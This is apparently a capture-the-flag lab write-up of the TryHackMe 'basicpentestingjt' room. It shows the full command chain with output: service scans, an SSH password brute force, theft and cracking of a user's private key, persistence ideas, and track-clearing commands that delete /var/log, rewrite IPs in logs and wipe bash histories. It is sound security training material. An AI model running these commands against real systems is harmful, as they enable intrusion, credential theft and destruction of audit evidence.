Skip to content
Hackatorium

THM:basicpentestingjt

basicpentestingjt

URL: https://tryhackme.com/room/basicpentestingjt   Easy

PHASE 1: Reconnaissance

Description of the room:

In these set of tasks you’ll learn the following:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux Enumeration

The main goal here is to learn as much as possible. Make sure you are connected to our network using your OpenVPN configuration file.

Credits to Josiah Pierce from Vulnhub.

PHASE 2: Scanning & Enumeration

Running: nmap

Ran the following:

nmap -sC -sV xxx.xxx.xxx.xxx

Which produced the following output:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-17 23:17 EST
Nmap scan report for 10.10.183.192
Host is up (0.28s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
8009/tcp open  ajp13
8080/tcp open  http-proxy


Nmap done: 1 IP address (1 host up) scanned in 24.35 seconds

Also see: nmap.log

Enumerating Samba Users

Since Samba is running, we can run:

/usr/share/enum4linux/enum4linux.pl -a xxx.xxx.xxx.xxx

This resulted in the following log (truncated for space, key portions kept or full log):

 =======================================================================
|    Users on 10.10.145.91 via RID cycling (RIDS: 500-550,1000-1050)    |
 =======================================================================
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)

From this, we know we have at least two users: jan, and kay.

Finding Web Server Folders

To attempt to find subfolders on the web server, GoBuster was used via:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://xxx.xxx.xxx.xxx/

This is what allowed us to find the /development folder:

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.183.192/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/17 23:22:47 Starting gobuster in directory enumeration mode
===============================================================


/development          (Status: 301) [Size: 320] [--> http://10.10.183.192/development/]

Also see: gobuster.log

Attempting to guess jan SSH password

Using hydra, we try RockYou passwords over SSH with:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://xxx.xxx.xxx.xxx

Which resulted in:

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).


Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-17 23:30:43
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (ignored ...) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.183.192:22/
[STATUS] 170.00 tries/min, 170 tries in 00:01h, 14344231 to do in 1406:18h, 16 active
[STATUS] 112.67 tries/min, 338 tries in 00:03h, 14344063 to do in 2121:55h, 16 active
[STATUS] 109.29 tries/min, 765 tries in 00:07h, 14343636 to do in 2187:29h, 16 active
[22][ssh] host: 10.10.183.192   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-01-17 23:37:48

This is where we discovered the password: armando for user jan.

Also see: hydra.log

PHASE 3: Gaining Access

Privilege Escalation from jan to kay.

In the process of running Linpeas, we found that user jan had privilege to read user kay’s SSH private key. So, the key was retrieved via:

cat /home/kay/.ssh/id_rsa

When attempting to log into the server as Kay via:

ssh kay@xxx.xxx.xxx.xxx -i ./kay_id_rsa

We are confronted with a password prompt. The SSH key is password protected.

Processing Kay’s Private SSH Key

We can take that private key:

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75


IoNb/J0q2Pd56EZ23oAaJxLvhuSZ1crRr4ONGUAnKcRxg3+9vn6xcujpzUDuUtlZ
o9dyIEJB4wUZTueBPsmb487RdFVkTOVQrVHty1K2aLy2Lka2Cnfjz8Llv+FMadsN
(...snip...)
e5ofsDLuIOhCVzsw/DIUrF+4liQ3R36Bu2R5+kmPFIkkeW1tYWIY7CpfoJSd74VC
3Jt1/ZW3XCb76R75sG5h6Q4N8gu5c/M0cdq16H9MHwpdin9OZTqO2zNxFvpuXthY
-----END RSA PRIVATE KEY-----

We can put that into a format for “John the Ripper”, so that he can crack that password. We can do that by running the ssh2john.py script from here:

ssh2john.py ./kay_id_rsa > ./kay_id_rsa.hash

Resulting in the following hash of the private key file, suitable for John The Ripper to extract the key:

./kay_rsa_id:$sshng$1$16$6ABA7DE35C{...snip...}edb337116fa6e5ed858

We then run John the Ripper against it, using a word list:

john --wordlist=/usr/shared/wordlists/rockyou.txt ./kay_id_rsa.hash

We ultimately determine the password for the SSH key is: beeswax.

Once logged in as user kay, we could read the pass.bak file which had the final flag of: heresareallystrongpasswordthatfollowsthepasswordpolicy$$.

PHASE 4: Maintaining Access

This is a test machine. However, in a Red Team scenario, we could:

  • Add SSH key to /root/.ssh/authorized_keys
  • Create a privileged account that wouldn’t draw attention (ex: operations).
  • Install some other backdoor or service.

PHASE 5: Clearing Tracks

This is a test machine. However, in a Red Team scenario, we could:

Delete relevant logs from /var/log/ - although that might draw attention

rm -Rf /var/log/*

Search and replace our IP address in all logs via

find /var/log -name "*" -exec sed -i 's/10.10.2.14/127.0.0.1/g' {} \;

Wipe bash history for any accounts we used via

cat /dev/null > /root/.bash_history

cat /dev/null > /home/kathy/.bash_history

cat /dev/null > /home/sam/.bash_history